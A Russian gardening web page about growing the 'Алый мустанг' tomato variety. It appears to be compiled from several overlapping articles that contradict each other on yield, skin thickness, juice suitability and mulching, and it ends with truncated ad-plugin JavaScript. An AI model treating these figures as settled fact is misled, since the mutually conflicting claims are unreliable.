2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Характеристика томата алый мустанг и выращивание рассадным методом

Алый мустанг – отличный сорт перцевидных помидоров

Помидоры Алый мустанг – достижение сибирских селекционеров Дедерко В. Н. и Постниковой О. В. , сорт вывели в 2014 году, но уже популярность его среди дачников во всех регионах России стремительно растет, тому есть немало причин. Главными из них являются хорошая стойкость к заболеваниям, приятный вкус душистых плодов.

Общие сведения

Стебли томатов Алый мустанг растут вплоть до окончания сезона, поэтому нуждаются в подвязке к опорам по мере роста. Как и другие индетерминантные сорта, он нуждается в пасынковании и формировании. Оптимальным вариантом считается два стебля на одном кусте. Остальные нужно удалять.

Первые зрелые помидоры появляются через 110 — 116 дней после посева семян. Таким образом, в Средней полосе России сбор урожая этих помидоров приходится на конец июля, а то и начало августа.

Спрашивайте и получайте полезные советы от профессиональных садоводов и опытных дачников.Задать вопрос >>

Томат Алый мустанг неприхотливым называть не получится. Он требует к себе точного соблюдения правил ухода. Только тогда урожай будет составлять от 2-х до 3-х кг с одного куста. Как видите, высокой плодовитостью Мустанг не отличаются, но зато помидоры у него просто объедение, особенно консервированные.

Особенности выращивания

Семена от компании «Сибирский сад» перед посевом нужно обязательно подготавливать. Дело достаточно хлопотное, а начинать подготовку нужно за неделю до посадки, это последняя декада марта или начало апреля. Сперва семена замачивают в слабом растворе марганцовки. Где-то через полчаса их промывают теплой водой, затем на сутки помещают в стимулятор роста.

Лучшими стимуляторами огородники считают «Эпин», «Циркон», «Корневин». Через день семена помещают во влажную марлю и оставляют их там до появления признаков начала прорастания. Марля с семенами должна находиться в теплом месте и всегда быть влажной. Только после этого проросшие семена можно сажать на в грунт.

Этот процесс также несколько обременителен. Контейнеры для рассады нужно заполнить не первой попавшейся почвой, а специально приготовленной. Она должна состоять из перегноя, песка и дерновой земли, взятых в равной пропорции. Не помешает добавить немного просеянной древесной золы.

Семена должны быть углублены в почву на 1 см. После этого посев нужно увлажнить из пульверизатор, накрыть стеклом или прозрачной пленкой. Рекомендуется ежедневно контейнеры проветривать, следить, чтобы земля всегда была немного влажной. Переувлажнение, равно как пересыхание почвы, ведет к гибели помидоров.

Контейнеры с рассадой до появления ростков должны оставаться в светлом помещении с температурой воздуха 23 — 25 градусов. Когда на всходах образуется по два листочка, их можно пересаживать в отдельные стаканчики. Лучше использовать торфяные стаканчики, потому что пересаживать рассаду в грунт так удобнее. Через две недели можно удобрить почву жидкими минеральными удобрениями.

За несколько дней до посадки рассады ее нужно начинать закаливать. Для этого стаканчики выносят на открытый воздух каждый день, увеличивая время. Последние сутки перед посадкой в почву она должна оставаться на открытом воздухе все время.

Важно соблюсти такое правило. Пересаживать рассаду в почву нужно через 50 — 60 дней после посева семян.

Уход за помидорами

К пересадке в грунт следует подготовиться. Грядки под эти томаты нужно заранее вскопать, обеззаразить. Для этого можно их полить крутым кипятком или слабым раствором марганца. Лунки под рассаду нужно выкопать так, чтобы стаканчики плотно в них помещались, а их верхняя кромка не возвышалась бы над почвой.

Опытные огородники в каждую лунку всегда добавляют по одной столовой ложке просеянной древесной золы. Это отличная профилактика против вредителей. Количество лунок на одном квадратном метре не должно быть более трех. Это тоже очень важно.

После этого можно размещать стаканчики с рассадой в лунки.

Опоры для подвязки стеблей лучше установить сразу, а можно и по мере реальной необходимости.

Когда рассада станет активно расти, нужно удалить все пасынки, оставить только два стебля, которые следует подвязать к опорам.

Первую подкормку нужно сделать через 15 дней после посадки. Для этого понадобится 10 литров воды, по 25 — 30 граммов суперфосфата и сульфата калия. Под каждый кустик нужно вылить не более одного литра такого раствора.

Второй раз почву под помидорами Мустанг можно удобрить раствором мочевины или настоем коровяка. Это лучше сделать при начале формирования плодов. Некоторые огородники за неделю до начала сбора урожая удобряют почву настоем куриного помета.

Что нужно делать для получения максимального урожая

Грядки с этими томатами нужно регулярно пропалывать. Помидоры Алый мустанг, по характеристике, не восприимчивы к заболеваниям, но, тем не менее, профилактические меры лучше принять.

Печально то, что этот сорт плохо переносит низкую температуру воздуха. Если в ваших краях летом случаются холодные дни, то лучше выращивать томаты в теплицах.

Использование плодов

Внешний вид помидоров Алый мустанг, как вы уже поняли по фото, несколько необычный. По форме и размеру они напоминают перец. Причем длина плодов, согласно описанию, может достигать 25-ти см! Верхушки плодов заостренные, а поверхность гладкая, чуть ребристая – все это вы увидите в видео сюжетах.

Радикальное отличие от большинства других сортов – мякоть и кожура этих помидоров довольно плотная. Именно благодаря этому Алый мустанг хозяйки так охотно консервируют. Также они очень вкусны маринованные и засоленные.

Плотная мякоть и кожура способствуют тому, что эти помидоры можно хранить несколько месяцев, что подтверждают отзывы овощеводов. Правда, из-за этого из них не получается приготовить сок или приправы. В салатах же помидоры Алый мустанг очень даже вкусные. Также их можно сушить, вялить.

Помидоры имеют малиново-красный цвет, в стадии созревания светло-зеленые. Зреют же они долго, не дружно становятся розовыми. Так что весь август вы можете наслаждаться свежими, только что сорванными с грядки помидорчиками.

Томат «Алый мустанг», характеристика и описание сорта

Помидор «Алый мустанг», описание которого мы вам предлагаем прочесть, одним названием уже вызывает неподдельный интерес. Ведь часто случается так, что самые броские имена сортам дают за их необычные характеристики. Относится это правило к «Алому мустангу» или нет, мы сможем сказать только после его полного описания.

Общие характеристики

Есть сорта томатов очень старые, есть и новые. Кто-то верен десятками лет одним, а кто-то всегда ищет чего-то нового, что, вероятно, правильно, ведь сейчас выведено множество сортов, которые удовлетворят потребности любого дачника, независимо от его места жительства, времени, которым он располагает и плодородия почвы.

«Алый мустанг» — это новый томат, его занесли в реестр в 2014 году, но за эти 2-3 года он уже стал популярным и любимым, отзывы дачников весьма положительные. Сорт выведен сибирскими селекционерами, которые славятся своими томатами. «Алый мустанг» имеет очень много преимуществ – ему не страшны болезни, урожаи даёт высокие, а плоды его вкусны и очень ароматны. Давайте, более подробно поговорим о помидоре далее.

Томат «Алый мустанг». Характеристика и описание сорта

  • Относится к индетерминантным видам. Это значит, что кусты не имеют точки конечного роста.
  • Не штамбовый сорт.
  • Высота стебля может превышать 1.8 метра, что само собой подразумевает его подвязку. Листьев же на кустах немного, что хорошо помогает зреть урожаю. Они имеют небольшое опушение и тёмный зелёный цвет.
  • Одна кисть формирует 6-7 плодов.
  • Сорт имеет очень мощную корневую систему, которая разрастается в стороны, поэтому вы должны учесть этот фактор при посадке.
  • Относится к сортам со средними сроками созревания. Первые вкусные плоды вы сможете собрать через 115-120 суток после посева семян.
  • Максимально устойчивый сорт к самым распространённым заболеваниям томатов.
  • Лучшие показатели даёт в тепличных условиях, да и, вообще, лучше выращивать данный томат в закрытом пространстве.
  • Даёт высокие урожаи, с одного куста можно собирать более 5 кг плодов, которые, кстати, имеют необычную вытянутую форму, красный цвет. Возможно, из-за такого удлинения плодов сорт и получил свое название в честь легендарной машины.
  • В холодное неурожайное лето данный помидор может показывать не самые лучшие результаты.
  • Шкурка тонкая, мякоть сочная, ароматная, вкусная. Ребристости на плодах нет.
  • Размер помидоров 20-25 см, масса их в среднем 200 грамм, но могут достигать и 400 грамм.
  • Помидоры устойчивы к растрескиванию. Отзывы дачников говорят о том, что сорт очень хорошо хранится за счёт плотной шкурки, также его можно транспортировать.
  • Сорт имеет универсальное столовое назначение, может консервироваться, употребляться в свежих салатах, использоваться для соусов, пасты, соков.
  • Максимальные результаты показывает при формировании в два стебля. Требует пасынкования.

Агротехника выращивания

Томат «Алый мустанг» хорош, по отзывам. Фото тех, кто сажал, заинтересуют и тех, кто только думает, что посадить в новом сезоне. Данный помидор очень хорошо может вам подойти, а что и как делать, описано далее.

Данный сорт нужно подвергать предпосевной обработке – дезинфекции, стимуляции, проращиванию.

Итак, семена высевают в третьей декаде марта – первой апреля. Перед посевом их вымачивают за неделю в марганцовке, после чего промывают в тёплой воде, кладут в стимуляторы роста («Эпин», «Циркон», «Корневин»). Далее, семечки помещают в тёплую, влажную марлю или хлопчатобумажную ткань для прорастания. Материал должен быть всегда влажным, находиться в тёплом месте.

После чего производят посевы в контейнеры со смесью перегноя, песка и дерновой земли с ложкой золы. Можно купить грунт и готовым. Посевы углубляют на 1 см, увлажняют из пульверизатора и до момента всходов накрывают стеклом или пленкой. После чего ставят в тёплое место 23-25 градусов, где хорошо освещено.

В фазе двух листочков производят пикировку саженцев в отдельные горшочки. Грунт используют тот же по составу. После пикировки через две недели можно подкормить саженцы комплексным препаратом. Перед переносом в теплицу или в открытый грунт, если вы живёте в теплом климате, саженцы закаливают неделю. Перенос после входов саженцев осуществляют на 50-60 сутки.

Почву готовят заранее, также делают опоры. На один метр квадратный сажают 3 куста. В лунку сыпят ложку минеральной подкормки. Почву нужно перекопать заранее и пролить от паразитов кипятком или раствором марганца. Кусты высаживают, сразу подвязывают и по мере роста оставляют два стебля – удаляют все пасынки, кроме одного в верхней пазухе. В течение сезона вносят 3-4 раза подкормки. Первую через 15-20 дней – в ведре воды растворяют сульфат калия и суперфосфат по 25-30 грамм каждого и поливают кусты по литру под каждый. Далее, вы можете вносить мочевину, коровяк или куриный помёт. Данный сорт любит полив, но обязательно помните про проветривание теплицы.

Чтобы томаты лучше плодоносили, примерно раз в неделю аккуратно трясите кусты для переопыления.

Эти приемы основные, их вполне достаточно, помимо, конечно, удаления сорняков и пасынкования. «Алый мустанг» порадует вас своим вкусом и удивит внешним видом.

Характеристика томата Алый мустанг и выращивание рассадным методом

Характеристика и описание сорта томата Алый мустанг позволяет ему выгодно выделяться среди других пасленовых. Помидоры богаты витаминами и микроэлементами, служат ингредиентами большого количества блюд – от простых салатов до ресторанных шедевров. Не оставил томат алого цвета равнодушными не только кулинаров, но и огородников.

Общее описание сорта

Прекрасным выбором для любителей романтичных названий является томат Алый мустанг. Он покоряет своей необычной формой и потрясающим вкусом. Выведен сортовой томат совсем недавно, в 2014 г., селекционерами России. Кусты вырастают высокими (до 2 м) и мощными. Корни растения очень прочные. Культивировать помидоры сорта Алый Мустанг можно в теплицах и открытом грунте. Но описание сорта показывает, что урожай богаче при выращивании в теплицах.

Урожайность растения очень высокая, с куста можно собрать 5 кг (11 шт.) плодов. Помешать хорошему сбору плодов может разве что холодное лето, без солнечных дней. Болезням помидоры сорта Алый Мустанг практически не подвержены.

Плоды вырастают с кисло-сладким вкусом и приятны на вид. Имеют чудный аромат. Уникальна вытянутая форма томата, как и его плотность. Вес 1 помидора составляет всего 200 г. Плоды имеют приятный малиновый цвет. Прекрасно, что кожица помидоров не трескается. Томаты сорта Алый Мустанг могут долго храниться и без проблем переносить транспортировку.

Помидоры Алый мустанг применяются как в свежем виде, так и горячих блюдах. Томаты нельзя использовать при приготовлении сока. Хорошо использовать плоды в блюдах для детей.

Выращивание рассады

Сеять семена на рассаду нужно за 2 месяца до высадки в почву. Семена прорастают при температуре +25°С. Растения нуждаются в пикировании.

Поливать рассаду нужно редко, но обильно. Закалку рекомендуется начинать за неделю до пересадки в почву. На момент высадки в открытый грунт высота стеблей томата Алый Мустанг составляет 20-25 см.

Перед посевом семена нужно подержать в дезинфицирующем средстве. Глубина тары для рассады должна равняться 1 см, а расстояние между семенами составлять 1-1,5 см. Когда посевной материал посажен, емкость с землей накрывают пленкой для повышения влажности. Для рассады важен свет и простор.

Высадка в грунт и дальнейший уход

При высадке в грунт на 1 м² нужно посадить по 3 растения. После высадки полторы недели саженцы не стоит беспокоить и поливать. Нельзя допускать, чтобы место посадки находилось в тени, так как помидор Алый Мустанг – теплолюбивое растение.

Сажать томаты нужно глубоко в землю, тогда корни лучше развиваются, и растение получает больше влаги и минеральных веществ.

Урожайность будет высокой, если соблюдать режим полива и вовремя подкармливать растения. Если в период цветения каждые 5 дней легонько встряхивать кусты, то это ускорит образование завязей и увеличит их количество.

При поливе не нужно использовать прием дождевания. Лучше просто заливать воду под корень, не допуская попадания воды на листья и плоды, чтобы не допустить их ожогов.

На пользу Алому мустангу пойдет рыхление и мульчирование. Мульчирование под корнем поможет спасти помидоры от жары. Урожай будет больше и плоды вкуснее, если удобрять почву раз в полторы недели. Не повредит кустам утренний полив холодной водой.

Пасынкование рекомендуется делать до появления первых плодов. Убирать боковые побеги лучше всего вечером, но ни в коем случае ни днем. Так как растение высокое, нужно проводить подвязывание его стеблей, чтобы листочки не прикасались к почве.

Урожая будет много, а период его сбора долгим с середины июля до сентября. Лучше всего срывать уже спелые плоды. Они созревают каждые 3-5 дней. Томаты краснеют не все вместе, а постепенно.

За месяц до конца периода сбора урожая нужно сделать прищипывание. А для получения более крупных плодов рекомендуется проводить обрывание нижних листочков. Рыхление должно проводиться каждую неделю.

У томатов сорта Алый Мустанг очень хороший иммунитет ко многим болезням. Помидор не подвержен гнили и фитофторе. Несмотря на это, растению не повредит профилактика.

Многим огородникам нравится, что помидоры хорошо приспособлены к перемене погоды. Культуре не страшна засуха и зной. Урожайность сорта Алый Мустанг больше зависит от ухода, нежели от погодных условий.

Томат Алый мустанг: отзывы, фото

Современный рынок насыщен самыми разнообразным семенами сельскохозяйственных культур. Названия некоторых из них звучат иногда очень интригующе и привлекают внимание огородников. Ведь заядлые дачники стараются выращивать на своем участке не только опробованные, но и новые сорта и гибриды овощных растений. Томат Алый мустанг сразу привлекает к себе любителей сельскохозяйственных работ и столь странным названием, и необычным видом плодов на пакетике с семенами. Конечно же многие покупатели специализированных магазинов приобретают посадочный материал, услышав удачную рекламу. Огородники после получения урожая томатов Алый мустанг остаются довольны, что посадили у себя растения данного сорта. Все положительные характеристики, указанные на упаковке с семенами, подтверждаются при выращивании пасленовой культуры.

Описание томата Алый мустанг

Сорт Алый мустанг был получен в результате длительной работы русскими селекционерами. Сорт достаточно молодой, его возраст не превышает десятилетие. Но томаты Алый мустанг были подвергнуты тестированию учеными-биологами и разнообразным испытаниям, которые провели опытные огородники. После получения положительных результатов сорт прошел официальную процедуру регистрации в Госреестре РФ.

По описанию селекционеров томаты сорта Алый мустанг представляют собой мощный куст с такими частями:

  1. Разветвленной корневой системой, способной добывать влагу с большой глубины. Поэтому томаты без проблем переносят кратковременную засуху. Это также обуславливает условия пересадки. При пикировке каждый росток высаживается в емкость объемом 1 л. Это нужно для того, чтобы корни беспрепятственно развивались.
  2. Высоким толстым стеблем, высота которого может достигнуть 1,6 м.
  3. Крепкими ветками, покрытыми немногочисленными листовыми пластинками. Благодаря малому количеству листвы вызревающие плоды получают нужное количество солнечного тепла и света и при минимальной освещенности.
  4. Крупными желтыми цветками, собранными в кисти. Самое первое соцветие образуется вверху 7–8 листа.
  5. В цветочной кисти может завязаться и вызреть 5–7 помидоров.

Сорт является индетерминантным, рост кустов нужно периодически ограничивать. Алый мустанг относится к группе томатов со среднеранними сроками созревания.

Описание плодов

Не зря томат получил имя Алый мустанг. Его плоды крепкие и плотные, почти как тело мускулистой дикой лошади. А еще помидоры напоминают вытянутый сладкий перец.

Описание плодов томата Алый мустанг:

  • длина от 20 до 24 см;
  • форма овальная с вытянутым конусообразным кончиком;
  • поверхность гладкая и не ребристая;
  • кожица тонкая и плотная;
  • масса 200–300 г;

Цвет помидоров в молочной спелости – светло-зеленый, а у вызревших – насыщенно-красный или красно-малиновый. Вкусовые качества плодов неплохие. Но некоторым огородникам не очень нравится, что помидоры несочные.

Характеристика томата

Сорт считается промышленным. Алые томаты могут выращиваться на больших площадях. Фермеры считают использование пасленовой культуры рентабельным. Но и на приусадебных участках Алый мустанг порадует огородника стабильным и хорошим плодоношением.

Урожайность и плодоношение

Как видно по фото, томат Алый мустанг хорошо плодоносит.

  1. Если посадить кусты в теплице, то они будут плодоносить больше, чем высаженные в открытом грунте помидоры.
  2. Урожайность куста редко превышает 3–4 кг в северных регионах и 5–6 кг в южных.
  3. Товарность собранных плодов – до 96%.
  4. При недостатке тепла и солнечных лучей урожайность в разы снизится.
  5. Первый сбор томатов проводят уже через 90–120 дней.

Область применения плодов

По отзывам, томат Алый мустанг можно употреблять в сыром виде. Он используется при приготовлении салатов, супов и других блюд домашней кухни, плоды придадут блюду тонкий аромат и яркий вкус помидора. Также он годится для приготовления икры, солений и маринада. Однако из-за вкуса сорт не стоит брать для приготовления варения или других блюд, для которых подходят более сладкие разновидности. Мустанг не подойдет для создания томатной пасты, соуса или заправки для рагу, так как плоды вырастают крепкими и плотными.

Устойчивость к заболеваниям и вредителям

Как и многие современные сорта, Алый мустанг устойчив к заболеваниям, характерным для пасленовых культур. Насекомые-вредители также редко поражают томаты.

Достоинства и недостатки сорта

Сорт томатов Алый мустанг обладает следующими характеристиками:

  1. При регулярных обработках, уходе и дождевании куст будет хорошо плодоносить. В среднем, с растения собирают 8 кг помидоров за сезон.
  2. Благодаря твердости и упругости, томаты Мустанг легко перевозить. Транспортировка не испортит качества урожая, независимо от количества помидоров и длины пути.
  3. Вкусовые характеристики позволяют использовать томаты в качестве ингредиента в различных блюдах домашней кухни.
  4. В кулинарии используются как созревшие, так и зеленые томаты Мустанг.

Среди недостатков этого сорта можно отметить такие:

  1. Вкус томатов будет напрямую зависеть от погодных условий. Дождливые дни станут причиной пресности плодов, а солнце сделает их вкус более насыщенным.
  2. Растение неустойчиво к холоду. При понижении температуры воздуха до 6 °С выше нуля прекращается рост и нормальное развитие плодов.

Правила выращивания

Несмотря на то что томаты этого сорта не обладают особыми качествами, они нуждаются в постоянном уходе. Только с таким условием они будут плодоносить и приносить хороший урожай.

Посадка на рассаду

Первым шагом к выращиванию алых томатов сорта Мустанг будет посадка рассады:

  1. Необходимо взять грунт, насыщенный минеральными соединениями. Его смешивают с землей с грядки, на которую впоследствии будут высажены помидоры.
  2. Семена закладывают на глубину 2 см, обильно смачивают почву. Расстояние между посажеными растениями — не меньше 8 см.
  3. Когда ростки вытянутся до 5 см в длину и окрепнут, их можно закаливать. А затем – высаживать в открытый грунт или теплицу.

Пересадка томата

Оптимальным временем высадки будет время, когда на улице установилась постоянная температура выше +18 °С. В обычные теплицы ростки пересаживают в конце мая — июне, в отапливаемые комплексы — уже в апреле. При размещении в 1 ряд помещают 1 куст на 50 кв. см, 2 ряда — 1 растение на 60 кв. см, в 3 ряда — 1 куст на 80 кв. см.

Последующий уход за томатами

При уходе за томатами этого сорта необходимо соблюдать следующие правила:

  1. Проводить дождевание каждые 3 дня. При жаре — не реже раза в 2 дня.
  2. Подкормку повторяют каждые 3 недели. Для этого используют органические удобрения и добавки, в состав которых входят полезные для бактерий-симбионтов вещества.
  3. Когда кусты дорастут до 70 см в длину, необходимо подвязать растения. Для этого используют синтетические веревки и палки для опоры.
  4. Во время пасынкования оставляют только 2 основных стебля. Удаляются все боковые и слабые отростки. Процедуру прекращают после появления плодов.
  5. По отзывам опытных огородников, при уходе за сортом томата Алый мустанг не стоит мульчировать почву.

Борьба с вредителями и заболеваниями

Хоть сорт Алый мустанг и устойчив к напастям в виде заболеваний и насекомых, опытные дачники советуют осуществлять профилактические мероприятия. Особенно если томаты растут в условиях теплиц. Повышенная влажность т высокие температуры увеличивают вероятность поражения пасленовой культуры. Обычно применяют обработке бордосской жидкостью или медным купоросом.

А от вредителей помогают инсектициды, имеющие биологическую основу. Даже большое количество насекомых можно уничтожить за 2 часа, если провести обработку средством. А еще, инсектицид термостабилен, то есть не теряет своих свойств при температуре выше 30 °С.

Заключение

Томат Алый мустанг, по мнению многих садоводов, является хорошим растением для разведения. Однако для получения богатого и вкусного урожая необходимо усердие и терпение, иначе куст не будет обильно плодоносить.

Томат Алый мустанг: отзывы, фото

В море потрясающего разнообразия современных сортов томата названия их исполняют роль, и путеводителя, и одновременно рекламного маячка, который привлекает внимание неопытных еще помидоролюбов. Вот, например, томат Алый мустанг уже не может не заинтересовать одним своим наименованием. А, с другой стороны, томат действительно в некоторой мере оправдывает свое название, своей крепостью и плотностью вызывая ассоциации с крепким и мускулистым диким мустангом.

Томаты сорта Алый мустанг, описание и характеристики которых представлены в этой статье, появились сравнительно недавно, но уже приобрели известность в качестве перспективного для выращивания сорта.

Описание сорта

Помидоры Алый мустанг были выведены известными селекционерами Дедерко В. Н. и Постниковой О. В. в 10-х годах этого столетия. В 2014 году сорт был официально зарегистрирован в Госреестре РФ для выращивания во всех регионах России.

Этот сорт можно смело относить к индетерминантным помидорам, то есть к не имеющих ограничений в росте.

Естественно, как и все индетерминантные сорта, томат нуждается в пасынковании, формировании и регулярном подвязывании по мере его роста. Чаще всего его формируют в два стебля.

Несмотря на то что выращивать томат Алый Мустанг можно и в открытом, и в закрытом грунте, лучшие результаты, по отзывам огородников, получаются при посадке его в теплицах. В открытом грунте хороший урожай возможно получить лишь в южных регионах, при достаточном количестве тепла и солнца.

Кусты довольно крепкие, но листьев на них немного, что позволяет плодам получать необходимое количество солнечных лучей даже в условиях минимального освещения. Томаты этого сорта отличаются мощной корневой системой, которая позволяет им переносить относительный недостаток влаги. Но при выращивании рассады этот факт необходимо учитывать, после пикировки предоставляя каждому растению емкость для оптимального развития корневой системы, объемом не менее одного литра.

Соцветие у томатов простое, первая кисть формируется обычно после 7-8 листа. В одной кисти может присутствовать до 6-7 плодов.

По срокам созревания сорт относится к среднеранним, помидоры начинают зреть через 110-116 дней после появления полных всходов. Таким образом, сроки сбора томатов этого сорта приходятся чаще всего на конец июля – август.

Урожайность томатов этого сорта определяется во многом условиями выращивания и уходом. Он достаточно требователен к агротехнике, поэтому в среднем урожайность с куста составляет около 2-3 кг.

При этом товарность собранных плодов, то есть процент количества помидоров по своим внешним характеристикам пригодных для продажи от всех собранных плодов, составляет около 97%.

Оригинаторами не заявлено никаких особых данных об устойчивости томата Алый Мустанг к заболеваниям. Но судя по отзывам огородников, этот сорт томатов довольно стойко переносит многие напасти в виде многочисленных болезней и вредителей.

Но, томаты этого сорта плохо относятся к продолжительному воздействию низких температур. В условиях недостаточного тепла могут показать не самые высокие результаты по урожайности.

Характеристики плодов

Помидоры сорта Алый мустанг отличаются довольно-таки оригинальной внешностью. Мало тог, что по форме они напоминают сладкий перец, причем могут быть вытянуты в длину до 20-25 см, а кончик каждого помидора завершается выразительным носиком. Поверхность их гладкая и слаборебристая. Помидоры этого сорта еще обладают невероятно плотной мякотью и не менее плотной шкуркой. Кстати, именно по этой причине они позиционируются, прежде всего, как сорт, максимально пригодный для консервации. Поскольку они полностью сохраняют свою красивую уникальную форму в банках и не лопаются. Кроме того, отличаясь мясистой, крепкой мякотью, они очень вкусны в маринадах и в засолке.

Конечно, плотная кожица не делает эти помидоры идеальными для использования в салатах, хотя сам вкус плодов профессиональные дегустаторы оценивают на 5 баллов по пятибальной шкале. Плотная мякоть делает помидоры Алый мустанг идеальными для сушки и вяления, зато томатный сок из этих плодов у вас, скорее всего, не получится.

В недозрелом виде помидоры имеют светло-зеленый оттенок, в то время как по мере созревания плоды приобретают яркий красно-малиновый цвет.

По размерам плоды могут быть небольшими и средними, масса одного помидора обычно составляет около 100 грамм, в длину он вытянут на 15-18 см. Но при хорошем уходе плоды нередко достигают и 200-230 грамм, а в длину вытягиваются до 25 см. Малочисленные семена заключены в трех камерах.

Благодаря своим свойствам, помидоры Алый мустанг идеально приспособлены к транспортировке на длительные расстояния, поэтому фермерам имеет смысл присмотреться к этому сорту поближе.

Достоинства и недостатки

К преимуществам сорта можно отнести следующие факты:

  • Томаты этого сорта устойчивы ко многим болезням и вредителям, характерным для семейства пасленовых.
  • Сорт характеризуется высокой урожайностью, правда, для этого необходимо приложить определенные усилия.
  • Помидоры Алый Мустанг наряду с привлекательными вкусовыми характеристиками, обладают хорошей лежкостью и транспортабельностью.

Недостатки у этого сорта томатов также имеются:

  • Невысокая устойчивость к пониженным температурам воздуха;
  • Сравнительная требовательность к уходу, без которого не получишь достойного урожая.

Особенности выращивания

Для выращивания помидор этого сорта необходим рассадный период даже при посеве в южных регионах. Семена высеиваются в небольшие лоточки примерно за 60 дней до предполагаемой даты высадки рассады в теплицу или на открытую грядку. Сразу после прорастания важно увеличить степень освещения рассады до максимума и одновременно снизить температуру содержания растений хотя бы на несколько градусов. Эти условия послужат залогом образования крепкой и приземистой хорошо укорененной рассады.

После появления первых двух настоящих листьев молодые растения помидоров необходимо распикировать – пересадить каждое в отдельную емкость. Учитывая образование со временем мощной корневой системы у помидорных кустов, растения до высадки в грунт на постоянное место желательно несколько раз перевалить вместе с комом земли в большие по размеру горшки.

На каждый квадратный метр грядок высаживают не более 3-4 кустов томата Алый мустанг. Кусты сразу же необходимо подвязать и далее формировать в два ствола, периодически обрезая все лишние пасынки.

Подкормки и поливы в течение всего сезона составляют основу регулярного ухода за томатами. Мульчирование посадок соломой или перепревшими растительными остатками сможет значительно облегчить ваш труд по борьбе с сорняками и сделает ненужным рыхление почвы.

Отзывы огородников

Несмотря на относительную новизну сорта, многие огородники уже заинтересовались томатом Алый мустанг и поселили его на своих участках.

Заключение

Томат Алый мустанг превосходен для соления, маринования и прочих заготовок, хотя многие с удовольствием потребляют его и в салатах. Кроме того, он порадует вас устойчивостью к заболеваниям и даже урожайностью, если вы уделите ему немного больше обычного внимания.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
